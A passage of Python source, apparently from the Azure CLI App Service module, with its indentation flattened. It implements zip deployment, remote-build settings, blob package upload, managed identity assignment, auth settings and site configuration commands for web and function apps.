def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed. Use 'az webapp config appsettings list --name MyWebapp --resource-group "
"MyResourceGroup --subscription MySubscription' to list app settings and 'az webapp "
"config appsettings delete --name MyWebApp --resource-group MyResourceGroup "
"--setting-names <setting-names> to delete them.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# ignore apps with kind==null & not functions apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
cmd_app_type, name, resource_group_name))
app_type = _kind_to_app_type(app.kind) if app else None
if app_type != cmd_app_type:
raise ResourceNotFoundError(
"Unable to find {} '{}', in RG '{}'".format(cmd_app_type.value, name, resource_group_name),
"Use 'az {} show' to show {}s".format(app_type.value, app_type.value))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
